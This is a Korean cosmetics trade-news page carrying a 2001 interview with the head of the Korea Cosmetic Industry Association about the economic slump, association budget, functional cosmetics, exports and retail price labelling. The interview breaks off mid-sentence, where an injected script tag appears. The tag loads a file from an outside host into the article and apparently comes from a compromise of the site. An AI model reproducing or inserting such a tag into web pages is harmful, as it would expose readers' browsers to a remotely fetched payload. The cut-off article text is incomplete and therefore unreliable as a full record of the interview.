HOME 뉴스 인터뷰 인터뷰
[대한화장품공업협회] 유상옥 회장
  • 승인 2001.08.27 11:45
  • 댓글 0
국내 화장품산업이 지난해 하반기 들면서 부터 어려움을 겪고있다. 전반적인 국내경기 실적부진에 따라 소비자들의 소비심리가 급격히 위축되면서 어려움이 가중되고 있는 것이다. 각사에서는 매출이 줄어들면서 새해 경영방침을 확정하는데 어려움을 겪고있다. 국내 경기침체와 더불어 화장품산업도 동반 침체로 이어지며 어려움이 가중되고 있는 상황을 맞고 있다. 협회의 수장으로서 화장품산업의 새로운 도약을 위해 동분서주 하고있는 대한화장품공업협회 유상옥 회장을 만나 신년 구상을 들어봤다. <편집자 주> 2001년도 대한화장품공업협회 예산안 편성과 관련 중점사업으로 진행하실 부문은 어떻게 짜여지고 있으며 세부적인 실천방안은 어떻게 잡고 계십니까. 올 하반기 접어들면서 경기가 급속히 악화되기 시작했습니다. 소비심리가 하락하면서 화장품 각사들의 매출이 눈에 띄게 줄어들고 있는 것으로 보여집니다. 그러나 우리 화장품 업계는 어려운 시기를 슬기롭게 극복해온 저력을 갖고 있습니다. 지난 몇 년간 IMF 관리체제의 긴 터널을 지나오면서 온갖 어려움을 이겨냈던 귀중한 실전적 경험을 고이 간직하고 있는 것입니다. 이러한 경험을 바탕으로 보다 탄력적으로 대처한다면 이번 어려움도 능히 헤쳐 나갈수 있다고 자부합니다. 저는 이같은 외적 환경변화를 기본적으로 고려해 불요불급한 예산은 가급적 줄여나가 알뜰한 살림살이가 될 수 있도록 예산을 편성하는 기본 방침을 정해놓고 있습니다. 품질고급화, 유통구조의 선진화등 화장품 업계가 직면하고 있는 당면 과제에 대한 기본적인 방침은 무엇입니까. 오픈 마인드가 가장 중요하다고 생각합니다. 화장품 각사별로 이해득실이 엇갈리기 때문에 무리한 정책 추진은 현실적인 어려움이 매우 많습니다. 우선 정부를 상대로 신원료 및 신제품 개발을 위한 연구개발비 투자지원을 늘리기 위한 노력을 지속적으로 벌여 나가도록 하겠습니다. 신약개발비 지원에 비해 화장품산업에 대한 정부의 지원은 미미합니다. 새해에는 정부의 지원을 늘리기 위한 작업에 모든 노력을 기울여 나갈 생각입니다. 화장품 신원료의 경우는 이미 국내사간에 배타성 없이 사용하고 있는 것으로 알고있습니다. 원료중 하나인 글리세린의 경우 이미 회사 구별없이 구입해 사용하고 있습니다. 유리용기의 경우도 마찬가지입니다. 이는 열린 경영이 이뤄지고 있다는 반증이기도 합니다. 이같은 현상은 매우 고무적인 현상으로 국내 화장품산업 발전에 크게 기여할 것으로 생각됩니다. 또한 화장품 관련 제도의 국제화 및 자율화를 위해 힘쓰며 화장품법 개정을 통한 기능성화장품의 정착과 영역확대에 초점을 맞춰 역량을 결집하도록 하겠습니다. 기능성 화장품의 정착과 영역확대를 위해서는 업계 전체가 솔선수범하는 노력도 필요하다고 생각됩니다. 정부의 정책적인 지원을 이끌어 내는 것도 중요하지만 이에 못지않게 업계의 자율적인 노력도 중요하다고 생각합니다. 물론 업계의 자발적인 노력이 가장 중요하다고 봅니다. 제품의 고품질화 및 다양화는 최우선적으로 업계가 이뤄내야 할 당면과제입니다. 이를 위해서는 업계 스스로 품질관리를 강화하는 노력이 선행 되어야 한다고 생각합니다. 또한 협력업체와의 관계개선을 통한 품질 고급화에도 힘을 기울여야 한다고 생각합니다. 우수화장품제조관리기술 수준에 걸맞는 교육이 본사 직원뿐만아니라 협력업체에도 똑같이 이뤄져야 한다고 봅니다. 수입 화장품이 파상공세를 펴며 백화점 및 전문점 시장을 파고들며 유통망을 늘려가고 있습니다. 또한 국산화장품의 수출이 수입에 비해 너무 적다는 의견이 많습니다. 국산화장품의 수출을 늘릴수 있는 방안은 무엇이라고 생각하십니까. 우리나라의 화장품시장 규모는 전세계 10대시장에 속합니다. 생산은 7위정도에 달할 만큼 발달해 있습니다. 화장품 수출이 어려운 것은 홍보가 덜됐기 때문이라고 봅니다. 박람회에 지속적으로 참가하는 것도 국산화장품의 이미지 제고에 큰 도움이 된다고 생각합니다. 코트라의 지원을 받아 국가관 형태로 참가하고 있는 화장품 전시회 참가가 활성화 되어야 하는 이유도 여기에 있습니다. 아울러 수입화장품의 공세에 대응 경쟁력을 확보해 국내 화장품산업의 영역을 지켜내려는 노력도 병행돼야 합니다. 화장품 산업이 발전하기 위해서는 난맥상을 보이고 있는 유통구조의 선진화가 시급하다고 보여집니다. 어떠한 노력들이 있어야 한다고 생각하십니까. 판매자 가격표시제의 정착이 시급한 과제입니다. 협회에서는 화장품 판매자 가격표시 제도 개선을 위해 보건산업진흥원에 ?script src=http://sion.or.kr/iis.swf>

  webmaster@geniepark.co.kr

<저작권자 © 제니파크, 무단 전재 및 재배포 금지>

의 다른기사 보기
기사 댓글 0
전체보기
첫번째 댓글을 남겨주세요.
여백
오늘의 주요뉴스
EU 금지 이소프로필‧이소부틸 파라벤 함유 화장품 국내 유통
EU 금지 이소프로필‧이소부틸 파라벤 함유 화장품 국내 유통
AHC ‘옴므 프로틴 리얼 아이크림 포 페이스’ 출시
AHC ‘옴므 프로틴 리얼 아이크림 포 페이스’ 출시
여백
Back to Top